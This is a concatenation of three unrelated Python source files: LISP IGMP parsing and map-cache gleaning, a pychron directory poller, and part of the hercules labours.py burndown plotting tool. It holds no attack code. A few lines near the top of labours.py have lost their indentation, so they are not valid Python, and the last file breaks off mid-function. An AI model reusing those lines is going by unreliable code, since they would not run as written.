        igmp = igmp[group_size::]

        if ((record_type in lisp_igmp_record_types) == False):
            lprint("Invalid record type {}".format(record_type))
            continue
        #endif

        record_type_str = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(address)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format( \
            record_type_str, group_str, source_count))

        #
        # Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
        # MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
        # is a join. Everything else is a leave.
        #
        joinleave = False
        if (record_type in (1, 5)): joinleave = True
        if (record_type in (2, 4) and source_count == 0): joinleave = True
        j_or_l = "join" if (joinleave) else "leave"

        #
        # Suppress registration for link-local groups.
        #
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
            continue
        #endif

        #
        # (*,G) Join or Leave has been received if source count is 0.
        #
        # If this is IGMPv2 or just IGMPv3 reporting a group address, encode
        # a (*,G) for the element in the register_entries array.
        #
        if (source_count == 0):
            register_entries.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
                bold(group_str, False)))
        #endif

        #
        # Process (S,G)s (source records)..
        #
        for j in range(source_count):

            #
            # Truncated source list, return entries parsed so far.
            #
            if (len(igmp) < source_size): return(register_entries)

            address = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(address)
            source_str = source.print_address_no_iid()
            register_entries.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(j_or_l,
                green(source_str, False), bold(group_str, False)))
            igmp = igmp[source_size::]
        #endfor
    #endfor

    #
    # Return (S,G) entries to return to call to send a Map-Register.
    # They are put in a multicast Info LCAF Type with ourselves as an RLE.
    # This is spec'ed in RFC 8378.
    #
    return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#

# Module-level scratch IPv4 address, reused across calls to hold each
# gleaned multicast group address while it is checked and stored.
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)

def lisp_glean_map_cache(seid, rloc, encap_port, igmp):

    #
    # First do lookup to see if EID is in map-cache. Check to see if RLOC
    # or encap-port needs updating. If not, return. Set refresh timer since
    # we received a packet from the source gleaned EID.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()
        cached_rloc = mc.rloc_set[0]
        orloc = cached_rloc.rloc
        oport = cached_rloc.translated_port

        # Only an RLOC address change or a translated-port change requires
        # rebuilding the RLOC-set below.
        rloc_change = (orloc.is_exact_match(rloc) == False or
            oport != encap_port)

        if (rloc_change):
            e = green(seid.print_address(), False)
            r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
            lprint("Change gleaned EID {} to RLOC {}".format(e, r))
            cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
        #endif
    else:

        #
        # No entry yet, create a new gleaned map-cache entry for the
        # source EID.
        #
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        e = green(seid.print_address(), False)
        r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
        mc.add_cache()
    #endif

    #
    # Adding RLOC to new map-cache entry or updating RLOC for existing entry..
    #
    if (rloc_change):
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        # 253/255: low unicast priority, multicast priority unusable for a
        # gleaned entry.
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        rloc_set = [rloc_entry]
        mc.rloc_set = rloc_set
        mc.build_best_rloc_set()
    #endif

    #
    # Unicast gleaning only.
    #
    if (igmp == None): return

    #
    # Process IGMP report. For each group, put in map-cache with gleaned
    # source RLOC and source port.
    #
    lisp_geid.instance_id = seid.instance_id

    #
    # Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
    # The lisp-etr process will do this.
    #
    entries = lisp_process_igmp_packet(igmp)
    if (type(entries) == bool): return

    for source, group, joinleave in entries:
        # Only (*,G) reports are gleaned here; (S,G) entries are skipped.
        if (source != None): continue

        #
        # Does policy allow gleaning for this joined multicast group.
        #
        lisp_geid.store_address(group)
        allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
        if (allow == False): continue

        if (joinleave):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
        #endif
    #endfor
#enddef
#------------------------------------------------------------------------------
|
watcher.py | # ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import time
from traits.api import Str, Event
# ============= standard library imports ========================
from threading import Thread
from glob import glob
import os
# ============= local library imports ==========================
from pychron.loggable import Loggable
class DirectoryWatcher(Loggable):
    """Polls a directory for PNG files on a background thread.

    While running, any poll that finds ``*.png`` files fires the
    ``dir_changed`` event with the list of matching paths.
    """

    _path = Str
    _alive = False
    dir_changed = Event

    def __init__(self, path, *args, **kw):
        super(DirectoryWatcher, self).__init__(*args, **kw)
        self._path = path

    def start(self):
        self._start()

    def stop(self):
        # the poll loop checks this flag once per period and exits
        self._alive = False

    def _start(self):
        self.info('start polling {} for changes'.format(self._path))
        self._alive = True
        poller = Thread(target=self._poll)
        poller.start()

    def _poll(self):
        period = 1
        while self._alive:
            matches = glob(os.path.join(self._path, '*.png'))
            if matches:
                # assigning to a traits Event notifies listeners
                self.dir_changed = matches
            time.sleep(period)
# ============= EOF =============================================
|
labours.py | #!/usr/bin/env python3
import argparse
from datetime import datetime, timedelta
from importlib import import_module
import io
import json
import os
import re
import shutil
import sys
import tempfile
import threading
import time
import warnings
try:
from clint.textui import progress
except ImportError:
print("Warning: clint is not installed, no fancy progressbars in the terminal for you.")
progress = None
import numpy
import yaml
if sys.version_info[0] < 3:
# OK, ancients, I will support Python 2, but you owe me a beer
input = raw_input # noqa: F821
# Maps a hercules analysis name to the dotted import path of the protobuf
# message class used to decode that entry of AnalysisResults.contents.
PB_MESSAGES = {
    "Burndown": "internal.pb.pb_pb2.BurndownAnalysisResults",
    "Couples": "internal.pb.pb_pb2.CouplesAnalysisResults",
    "Shotness": "internal.pb.pb_pb2.ShotnessAnalysisResults",
}
def parse_args():
    """Build the labours command line interface and parse sys.argv."""
    parser = argparse.ArgumentParser()
    arg = parser.add_argument
    arg("-o", "--output", default="",
        help="Path to the output file/directory (empty for display). "
             "If the extension is JSON, the data is saved instead of "
             "the real image.")
    arg("-i", "--input", default="-",
        help="Path to the input file (- for stdin).")
    arg("-f", "--input-format", default="auto", choices=["yaml", "pb", "auto"])
    arg("--text-size", default=12, type=int,
        help="Size of the labels and legend.")
    arg("--backend", help="Matplotlib backend to use.")
    arg("--style", choices=["black", "white"], default="black",
        help="Plot's general color scheme.")
    arg("--size", help="Axes' size in inches, for example \"12,9\"")
    arg("--relative", action="store_true",
        help="Occupy 100%% height for every measurement.")
    arg("--couples-tmp-dir", help="Temporary directory to work with couples.")
    arg("-m", "--mode",
        choices=["project", "file", "person", "churn_matrix", "ownership",
                 "couples", "shotness", "sentiment", "all", "run_times"],
        help="What to plot.")
    arg("--resample", default="year",
        help="The way to resample the time series. Possible values are: "
             "\"month\", \"year\", \"no\", \"raw\" and pandas offset aliases ("
             "http://pandas.pydata.org/pandas-docs/stable/timeseries.html"
             "#offset-aliases).")
    arg("--disable-projector", action="store_true",
        help="Do not run Tensorflow Projector on couples.")
    arg("--max-people", default=20, type=int,
        help="Maximum number of developers in churn matrix and people plots.")
    return parser.parse_args()
class Reader(object):
    """Abstract interface of a hercules analysis-results loader.

    Concrete subclasses (YAML, protobuf) must override every accessor;
    each stub below raises NotImplementedError.
    """

    def read(self, file):
        """Load the results from *file* ("-" means stdin)."""
        raise NotImplementedError

    def get_name(self):
        """Return the analyzed repository name."""
        raise NotImplementedError

    def get_header(self):
        """Return the (begin, end) UNIX timestamps of the history."""
        raise NotImplementedError

    def get_burndown_parameters(self):
        """Return the (sampling, granularity) of the burndown analysis."""
        raise NotImplementedError

    def get_project_burndown(self):
        raise NotImplementedError

    def get_files_burndown(self):
        raise NotImplementedError

    def get_people_burndown(self):
        raise NotImplementedError

    def get_ownership_burndown(self):
        raise NotImplementedError

    def get_people_interaction(self):
        raise NotImplementedError

    def get_files_coocc(self):
        raise NotImplementedError

    def get_people_coocc(self):
        raise NotImplementedError

    def get_shotness_coocc(self):
        raise NotImplementedError

    def get_shotness(self):
        raise NotImplementedError
class YamlReader(Reader):
    """Reads hercules analysis results from the YAML output format."""

    def read(self, file):
        """Load the YAML document from *file* ("-" reads stdin) into self.data."""
        # hercules output can contain bytes PyYAML's reader considers
        # non-printable; neutralize that check so such documents still load
        yaml.reader.Reader.NON_PRINTABLE = re.compile(r"(?!x)x")
        try:
            loader = yaml.CLoader
        except AttributeError:
            print("Warning: failed to import yaml.CLoader, falling back to slow yaml.Loader")
            loader = yaml.Loader
        try:
            if file != "-":
                with open(file) as fin:
                    data = yaml.load(fin, Loader=loader)
            else:
                data = yaml.load(sys.stdin, Loader=loader)
        except (UnicodeEncodeError, yaml.reader.ReaderError) as e:
            print("\nInvalid unicode in the input: %s\nPlease filter it through "
                  "fix_yaml_unicode.py" % e)
            sys.exit(1)
        self.data = data

    def get_run_times(self):
        # per-item run times are not recorded in the YAML format
        return {}

    def get_name(self):
        return self.data["hercules"]["repository"]

    def get_header(self):
        """Return (begin_unix_time, end_unix_time) of the analyzed history."""
        header = self.data["hercules"]
        return header["begin_unix_time"], header["end_unix_time"]

    def get_burndown_parameters(self):
        """Return (sampling, granularity) of the burndown analysis."""
        header = self.data["Burndown"]
        return header["sampling"], header["granularity"]

    def get_project_burndown(self):
        return self.data["hercules"]["repository"], \
            self._parse_burndown_matrix(self.data["Burndown"]["project"]).T

    def get_files_burndown(self):
        return [(p[0], self._parse_burndown_matrix(p[1]).T)
                for p in self.data["Burndown"]["files"].items()]

    def get_people_burndown(self):
        return [(p[0], self._parse_burndown_matrix(p[1]).T)
                for p in self.data["Burndown"]["people"].items()]

    def get_ownership_burndown(self):
        # NOTE: matrices are deliberately NOT transposed here, unlike the
        # *_burndown accessors above
        return self.data["Burndown"]["people_sequence"].copy(),\
            {p[0]: self._parse_burndown_matrix(p[1])
             for p in self.data["Burndown"]["people"].items()}

    def get_people_interaction(self):
        return self.data["Burndown"]["people_sequence"].copy(), \
            self._parse_burndown_matrix(self.data["Burndown"]["people_interaction"])

    def get_files_coocc(self):
        coocc = self.data["Couples"]["files_coocc"]
        return coocc["index"], self._parse_coocc_matrix(coocc["matrix"])

    def get_people_coocc(self):
        coocc = self.data["Couples"]["people_coocc"]
        return coocc["index"], self._parse_coocc_matrix(coocc["matrix"])

    def get_shotness_coocc(self):
        """Assemble a CSR co-occurrence matrix from the Shotness records."""
        shotness = self.data["Shotness"]
        index = ["%s:%s" % (i["file"], i["name"]) for i in shotness]
        indptr = numpy.zeros(len(shotness) + 1, dtype=numpy.int64)
        indices = []
        data = []
        for i, record in enumerate(shotness):
            # counters keys arrive as strings; sort numerically for CSR order
            pairs = [(int(k), v) for k, v in record["counters"].items()]
            pairs.sort()
            indptr[i + 1] = indptr[i] + len(pairs)
            for k, v in pairs:
                indices.append(k)
                data.append(v)
        indices = numpy.array(indices, dtype=numpy.int32)
        data = numpy.array(data, dtype=numpy.int32)
        from scipy.sparse import csr_matrix
        return index, csr_matrix((data, indices, indptr), shape=(len(shotness),) * 2)

    def get_shotness(self):
        from munch import munchify
        obj = munchify(self.data["Shotness"])
        # turn strings into ints
        for item in obj:
            item.counters = {int(k): v for k, v in item.counters.items()}
        # an empty section signals "no data" via KeyError, like a missing key
        if len(obj) == 0:
            raise KeyError
        return obj

    def get_sentiment(self):
        from munch import munchify
        # each value is [value, commits, "comment|comment|..."]
        return munchify({int(key): {
            "Comments": vals[2].split("|"),
            "Commits": vals[1],
            "Value": float(vals[0])
        } for key, vals in self.data["Sentiment"].items()})

    def _parse_burndown_matrix(self, matrix):
        # each row of the matrix is a whitespace-separated string of ints
        return numpy.array([numpy.fromstring(line, dtype=int, sep=" ")
                            for line in matrix.split("\n")])

    def _parse_coocc_matrix(self, matrix):
        """Convert a list of {column: value} dicts to a CSR matrix."""
        from scipy.sparse import csr_matrix
        data = []
        indices = []
        indptr = [0]
        for row in matrix:
            for k, v in sorted(row.items()):
                data.append(v)
                indices.append(k)
            indptr.append(indptr[-1] + len(row))
        return csr_matrix((data, indices, indptr), shape=(len(matrix),) * 2)
class ProtobufReader(Reader):
    """Reads hercules analysis results from the protobuf output format."""

    def read(self, file):
        """Parse an AnalysisResults protobuf from *file* ("-" reads stdin)."""
        try:
            from internal.pb.pb_pb2 import AnalysisResults
        except ImportError as e:
            print("\n\n>>> You need to generate internal/pb/pb_pb2.py - run \"make\"\n",
                  file=sys.stderr)
            raise e from None
        self.data = AnalysisResults()
        if file != "-":
            with open(file, "rb") as fin:
                self.data.ParseFromString(fin.read())
        else:
            self.data.ParseFromString(sys.stdin.buffer.read())
        # decode each registered analysis payload into its message class
        self.contents = {}
        for key, val in self.data.contents.items():
            try:
                mod, name = PB_MESSAGES[key].rsplit(".", 1)
            except KeyError:
                sys.stderr.write("Warning: there is no registered PB decoder for %s\n" % key)
                continue
            cls = getattr(import_module(mod), name)
            self.contents[key] = msg = cls()
            msg.ParseFromString(val)

    def get_run_times(self):
        return {key: val for key, val in self.data.header.run_time_per_item.items()}

    def get_name(self):
        return self.data.header.repository

    def get_header(self):
        """Return (begin_unix_time, end_unix_time) of the analyzed history."""
        header = self.data.header
        return header.begin_unix_time, header.end_unix_time

    def get_burndown_parameters(self):
        """Return (sampling, granularity) of the burndown analysis."""
        burndown = self.contents["Burndown"]
        return burndown.sampling, burndown.granularity

    def get_project_burndown(self):
        return self._parse_burndown_matrix(self.contents["Burndown"].project)

    def get_files_burndown(self):
        return [self._parse_burndown_matrix(i) for i in self.contents["Burndown"].files]

    def get_people_burndown(self):
        return [self._parse_burndown_matrix(i) for i in self.contents["Burndown"].people]

    def get_ownership_burndown(self):
        people = self.get_people_burndown()
        return [p[0] for p in people], {p[0]: p[1].T for p in people}

    def get_people_interaction(self):
        burndown = self.contents["Burndown"]
        return [i.name for i in burndown.people], \
            self._parse_sparse_matrix(burndown.people_interaction).toarray()

    def get_files_coocc(self):
        node = self.contents["Couples"].file_couples
        return list(node.index), self._parse_sparse_matrix(node.matrix)

    def get_people_coocc(self):
        node = self.contents["Couples"].people_couples
        return list(node.index), self._parse_sparse_matrix(node.matrix)

    def get_shotness_coocc(self):
        """Assemble a CSR co-occurrence matrix from the Shotness records."""
        shotness = self.get_shotness()
        index = ["%s:%s" % (i.file, i.name) for i in shotness]
        indptr = numpy.zeros(len(shotness) + 1, dtype=numpy.int32)
        indices = []
        data = []
        for i, record in enumerate(shotness):
            pairs = list(record.counters.items())
            pairs.sort()
            indptr[i + 1] = indptr[i] + len(pairs)
            for k, v in pairs:
                indices.append(k)
                data.append(v)
        indices = numpy.array(indices, dtype=numpy.int32)
        data = numpy.array(data, dtype=numpy.int32)
        from scipy.sparse import csr_matrix
        return index, csr_matrix((data, indices, indptr), shape=(len(shotness),) * 2)

    def get_shotness(self):
        records = self.contents["Shotness"].records
        # an empty section signals "no data" via KeyError, mirroring YamlReader
        if len(records) == 0:
            raise KeyError
        return records

    def get_sentiment(self):
        byday = self.contents["Sentiment"].SentimentByDay
        if len(byday) == 0:
            raise KeyError
        return byday

    def _parse_burndown_matrix(self, matrix):
        """Densify a PB burndown matrix; returns (name, transposed dense)."""
        dense = numpy.zeros((matrix.number_of_rows, matrix.number_of_columns), dtype=int)
        for y, row in enumerate(matrix.rows):
            for x, col in enumerate(row.columns):
                dense[y, x] = col
        return matrix.name, dense.T

    def _parse_sparse_matrix(self, matrix):
        from scipy.sparse import csr_matrix
        return csr_matrix((list(matrix.data), list(matrix.indices), list(matrix.indptr)),
                          shape=(matrix.number_of_rows, matrix.number_of_columns))
# Dispatch table: input-format name (or file extension) -> reader class.
READERS = {"yaml": YamlReader, "yml": YamlReader, "pb": ProtobufReader}

def read_input(args):
    """Create the reader matching args.input_format and load args.input.

    When the format is "auto" it is inferred from the file extension, or
    defaults to YAML when reading from stdin.
    """
    sys.stdout.write("Reading the input... ")
    sys.stdout.flush()
    if args.input_format == "auto":
        args.input_format = \
            args.input.rsplit(".", 1)[1] if args.input != "-" else "yaml"
    reader = READERS[args.input_format]()
    reader.read(args.input)
    print("done")
    return reader
def calculate_average_lifetime(matrix):
    """Compute the normalized average "lifetime" index of a burndown matrix.

    Each row (band) contributes the per-sample decrements of surviving
    lines, weighted by their age; returns numpy.nan when nothing decayed.
    """
    lifetimes = numpy.zeros(matrix.shape[1] - 1)
    for band in matrix:
        start = 0
        for i, value in enumerate(band):
            # skip until the band actually has lines to lose
            if i == 0 or band[i - 1] == 0:
                start += 1
                continue
            lifetimes[i - start] = band[i - 1] - value
        # the remaining lines at the end count with the last observed size
        lifetimes[i - start] = band[i - 1]
    total = lifetimes.sum()
    if total == 0:
        return numpy.nan
    ages = numpy.arange(1, matrix.shape[1], 1)
    return lifetimes.dot(ages) / (total * matrix.shape[1])
def interpolate_burndown_matrix(matrix, granularity, sampling):
    """Upsample a bands x samples burndown matrix to day x day resolution.

    Each band of `granularity` days becomes that many daily rows and each
    sample of `sampling` days that many daily columns; values are
    interpolated linearly between recorded samples. Returns a float32
    matrix of shape (bands * granularity, samples * sampling).
    """
    daily = numpy.zeros(
        (matrix.shape[0] * granularity, matrix.shape[1] * sampling),
        dtype=numpy.float32)
    """
    ----------> samples, x
    |
    |
    |
    ⌄
    bands, y
    """
    for y in range(matrix.shape[0]):
        for x in range(matrix.shape[1]):
            if y * granularity > (x + 1) * sampling:
                # the future is zeros
                continue

            def decay(start_index: int, start_val: float):
                # linearly decay each daily row of this band from its value
                # at start_index - 1 toward matrix[y][x] at the sample end
                if start_val == 0:
                    return
                k = matrix[y][x] / start_val  # <= 1
                scale = (x + 1) * sampling - start_index
                for i in range(y * granularity, (y + 1) * granularity):
                    initial = daily[i][start_index - 1]
                    for j in range(start_index, (x + 1) * sampling):
                        daily[i][j] = initial * (
                            1 + (k - 1) * (j - start_index + 1) / scale)

            def grow(finish_index: int, finish_val: float):
                # linearly grow the band's daily values up to finish_val at
                # finish_index, spreading the average increment per day
                initial = matrix[y][x - 1] if x > 0 else 0
                start_index = x * sampling
                if start_index < y * granularity:
                    start_index = y * granularity
                if finish_index == start_index:
                    return
                avg = (finish_val - initial) / (finish_index - start_index)
                for j in range(x * sampling, finish_index):
                    for i in range(start_index, j + 1):
                        daily[i][j] = avg
                # copy [x*g..y*s)
                for j in range(x * sampling, finish_index):
                    for i in range(y * granularity, x * sampling):
                        daily[i][j] = daily[i][j - 1]

            if (y + 1) * granularity >= (x + 1) * sampling:
                # the band ends at or after the sample end: the value is
                # still growing throughout this sample interval
                if y * granularity <= x * sampling:
                    grow((x + 1) * sampling, matrix[y][x])
                elif (x + 1) * sampling > y * granularity:
                    # the band starts mid-sample: grow to the sample end and
                    # spread the average over the partial triangle
                    grow((x + 1) * sampling, matrix[y][x])
                    avg = matrix[y][x] / ((x + 1) * sampling - y * granularity)
                    for j in range(y * granularity, (x + 1) * sampling):
                        for i in range(y * granularity, j + 1):
                            daily[i][j] = avg
            elif (y + 1) * granularity >= x * sampling:
                # the band ends inside this sample: the value peaked between
                # x*sampling and (x+1)*sampling and then decayed
                v1 = matrix[y][x - 1]
                v2 = matrix[y][x]
                delta = (y + 1) * granularity - x * sampling
                previous = 0
                if x > 0 and (x - 1) * sampling >= y * granularity:
                    # the previous sample lies fully inside the band; use it
                    # to estimate the growth slope
                    if x > 1:
                        previous = matrix[y][x - 2]
                    scale = sampling
                else:
                    scale = sampling if x == 0 else x * sampling - y * granularity
                peak = v1 + (v1 - previous) / scale * delta
                if v2 > peak:
                    # we need to adjust the peak, it may not be less than the decayed value
                    if x < matrix.shape[1] - 1:
                        k = (v2 - matrix[y][x + 1]) / sampling  # > 0
                        peak = matrix[y][x] + k * ((x + 1) * sampling - (y + 1) * granularity)
                        # peak > v2 > v1
                    else:
                        peak = v2
                        # not enough data to interpolate; this is at least not restricted
                grow((y + 1) * granularity, peak)
                decay((y + 1) * granularity, peak)
            else:
                # (x+1)*granularity < y*sampling
                # y*sampling..(y+1)sampling
                decay(x * sampling, matrix[y][x - 1])
    return daily
def load_burndown(header, name, matrix, resample):
    """Prepare a burndown matrix for plotting.

    Returns (name, matrix, date_range_sampling, labels, granularity,
    sampling, resample); unless resample is "no"/"raw", the matrix is
    interpolated to daily resolution and re-aggregated at the requested
    pandas frequency.
    """
    import pandas

    start, last, sampling, granularity = header
    assert sampling > 0
    assert granularity >= sampling
    start = datetime.fromtimestamp(start)
    last = datetime.fromtimestamp(last)
    print(name, "lifetime index:", calculate_average_lifetime(matrix))
    finish = start + timedelta(days=matrix.shape[1] * sampling)
    if resample not in ("no", "raw"):
        print("resampling to %s, please wait..." % resample)
        # Interpolate the day x day matrix.
        # Each day brings equal weight in the granularity.
        # Sampling's interpolation is linear.
        daily = interpolate_burndown_matrix(matrix, granularity, sampling)
        # zero out days beyond the last recorded commit
        daily[(last - start).days:] = 0
        # Resample the bands
        aliases = {
            "year": "A",
            "month": "M"
        }
        resample = aliases.get(resample, resample)
        # find how many resample periods cover [start, finish)
        periods = 0
        date_granularity_sampling = [start]
        while date_granularity_sampling[-1] < finish:
            periods += 1
            date_granularity_sampling = pandas.date_range(
                start, periods=periods, freq=resample)
        date_range_sampling = pandas.date_range(
            date_granularity_sampling[0],
            periods=(finish - date_granularity_sampling[0]).days,
            freq="1D")
        # Fill the new square matrix
        matrix = numpy.zeros(
            (len(date_granularity_sampling), len(date_range_sampling)),
            dtype=numpy.float32)
        for i, gdt in enumerate(date_granularity_sampling):
            istart = (date_granularity_sampling[i - 1] - start).days \
                if i > 0 else 0
            ifinish = (gdt - start).days
            # find the first daily column at or past this period's start
            for j, sdt in enumerate(date_range_sampling):
                if (sdt - start).days >= istart:
                    break
            matrix[i, j:] = \
                daily[istart:ifinish, (sdt - start).days:].sum(axis=0)
        # Hardcode some cases to improve labels' readability
        if resample in ("year", "A"):
            labels = [dt.year for dt in date_granularity_sampling]
        elif resample in ("month", "M"):
            labels = [dt.strftime("%Y %B") for dt in date_granularity_sampling]
        else:
            labels = [dt.date() for dt in date_granularity_sampling]
    else:
        labels = [
            "%s - %s" % ((start + timedelta(days=i * granularity)).date(),
                         (
                             start + timedelta(days=(i + 1) * granularity)).date())
            for i in range(matrix.shape[0])]
        if len(labels) > 18:
            warnings.warn("Too many labels - consider resampling.")
        resample = "M"  # fake resampling type is checked while plotting
        date_range_sampling = pandas.date_range(
            start + timedelta(days=sampling), periods=matrix.shape[1],
            freq="%dD" % sampling)
    return name, matrix, date_range_sampling, labels, granularity, sampling, resample
def load_ownership(header, sequence, contents, max_people):
    """Build the per-person ownership series for the stacked ownership plot.

    Returns (sequence, people, date_range_sampling, last) where people is a
    (person x sample) array of owned line counts; only the top *max_people*
    owners are kept and long names are shortened for display.
    """
    import pandas

    start, last, sampling, _ = header
    start = datetime.fromtimestamp(start)
    last = datetime.fromtimestamp(last)

    # each person's burndown matrix collapses to total lines per sample
    people = numpy.array([contents[name].sum(axis=1) for name in sequence])
    date_range_sampling = pandas.date_range(
        start + timedelta(days=sampling), periods=people[0].shape[0],
        freq="%dD" % sampling)

    if people.shape[0] > max_people:
        chosen = numpy.argsort(-people.sum(axis=1))[:max_people]
        people = people[chosen]
        sequence = [sequence[i] for i in chosen]
        print("Warning: truncated people to most owning %d" % max_people)

    # shorten over-long names in place for readable legends
    for i, name in enumerate(sequence):
        if len(name) > 40:
            sequence[i] = name[:37] + "..."

    return sequence, people, date_range_sampling, last
def load_churn_matrix(people, matrix, max_people):
    """Normalize the churn (overwrite) matrix for plotting.

    Rows are divided by each developer's own-lines column and negated;
    developers beyond *max_people* (by column 0) are dropped, and long
    names are shortened in place.
    """
    matrix = matrix.astype(float)
    if matrix.shape[0] > max_people:
        keep = numpy.argsort(-matrix[:, 0])[:max_people]
        # columns 0 and 1 are special; the rest follow the kept row order
        matrix = matrix[keep][:, [0, 1] + list(2 + keep)]
        people = [people[i] for i in keep]
        print("Warning: truncated people to most productive %d" % max_people)
    zeros = matrix[:, 0] == 0
    # avoid dividing by zero for developers with no own lines
    matrix[zeros, :] = 1
    matrix /= matrix[:, 0][:, None]
    matrix = -matrix[:, 1:]
    matrix[zeros, :] = 0
    for i, name in enumerate(people):
        if len(name) > 40:
            people[i] = name[:37] + "..."
    return people, matrix
def apply_plot_style(figure, axes, legend, style, text_size, axes_size):
    """Apply the shared color scheme and sizing to a Matplotlib figure.

    *style* is a color name ("black"/"white") applied to spines, labels
    and ticks; *axes_size* is a "W,H" inches string or None for 12x9.
    """
    size = (12, 9) if axes_size is None else tuple(
        float(p) for p in axes_size.split(","))
    figure.set_size_inches(*size)
    for side in ("bottom", "top", "left", "right"):
        axes.spines[side].set_color(style)
    axes.xaxis.label.update(dict(fontsize=text_size, color=style))
    axes.yaxis.label.update(dict(fontsize=text_size, color=style))
    for name in ("x", "y"):
        getattr(axes, name + "axis").get_offset_text().set_size(text_size)
        axes.tick_params(axis=name, colors=style, labelsize=text_size)
    try:
        axes.ticklabel_format(axis="y", style="sci", scilimits=(0, 3))
    except AttributeError:
        # some axes types do not support scientific tick formatting
        pass
    if legend is not None:
        # invert the legend frame colors against the chosen scheme
        frame = legend.get_frame()
        frame.set_facecolor("black" if style == "white" else "white")
        frame.set_edgecolor("black" if style == "white" else "white")
        for text in legend.get_texts():
            text.set_color(style)
def get_plot_path(base, name):
    """Derive a per-plot output path from the base output path.

    "out.png" + "project" -> "out/project.png"; a missing extension
    defaults to ".png". The containing directory is created if needed.
    """
    root, ext = os.path.splitext(base)
    output = os.path.join(root, name + (ext or ".png"))
    os.makedirs(os.path.dirname(output), exist_ok=True)
    return output
def deploy_plot(title, output, style):
    """Show the current Matplotlib figure, or save it to *output*, then clear it."""
    import matplotlib.pyplot as pyplot

    if output:
        if title:
            pyplot.title(title, color=style)
        try:
            pyplot.tight_layout()
        except:  # noqa: E722
            print("Warning: failed to set the tight layout")
        pyplot.savefig(output, transparent=True)
    else:
        # interactive display: put the title on the window instead
        pyplot.gcf().canvas.set_window_title(title)
        pyplot.show()
    pyplot.clf()
def default_json(x):
    """json.dump fallback: arrays via tolist(), dates via isoformat()."""
    for attr in ("tolist", "isoformat"):
        if hasattr(x, attr):
            return getattr(x, attr)()
    return x
def plot_burndown(args, target, name, matrix, date_range_sampling, labels, granularity,
                  sampling, resample):
    """Render one burndown stackplot, or dump its inputs to JSON.

    When args.output ends in ".json" the plot inputs are serialized
    instead of rendered; otherwise the chart is drawn and handed to
    deploy_plot for display or saving.
    """
    if args.output and args.output.endswith(".json"):
        data = locals().copy()
        del data["args"]
        data["type"] = "burndown"
        if args.mode == "project" and target == "project":
            output = args.output
        else:
            if target == "project":
                name = "project"
            output = get_plot_path(args.output, name)
        with open(output, "w") as fout:
            json.dump(data, fout, sort_keys=True, default=default_json)
        return

    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot

    pyplot.stackplot(date_range_sampling, matrix, labels=labels)
    if args.relative:
        # normalize each sample column to 1 so bands show relative share
        for i in range(matrix.shape[1]):
            matrix[:, i] /= matrix[:, i].sum()
        pyplot.ylim(0, 1)
        legend_loc = 3
    else:
        legend_loc = 2
    legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
    pyplot.ylabel("Lines of code")
    pyplot.xlabel("Time")
    apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
    pyplot.xlim(date_range_sampling[0], date_range_sampling[-1])
    locator = pyplot.gca().xaxis.get_major_locator()
    # set the optimal xticks locator
    if "M" not in resample:
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
    locs = pyplot.gca().get_xticks().tolist()
    if len(locs) >= 16:
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
        locs = pyplot.gca().get_xticks().tolist()
        if len(locs) >= 16:
            # yearly ticks are still too dense; fall back to the original
            pyplot.gca().xaxis.set_major_locator(locator)
    if locs[0] < pyplot.xlim()[0]:
        del locs[0]
    endindex = -1
    if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
        locs.append(pyplot.xlim()[1])
        endindex = len(locs) - 1
    startindex = -1
    if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
        locs.append(pyplot.xlim()[0])
        startindex = len(locs) - 1
    pyplot.gca().set_xticks(locs)
    # hacking time!
    labels = pyplot.gca().get_xticklabels()
    if startindex >= 0:
        # pin the first tick label to the exact start date and freeze it so
        # later draw passes cannot overwrite the text
        labels[startindex].set_text(date_range_sampling[0].date())
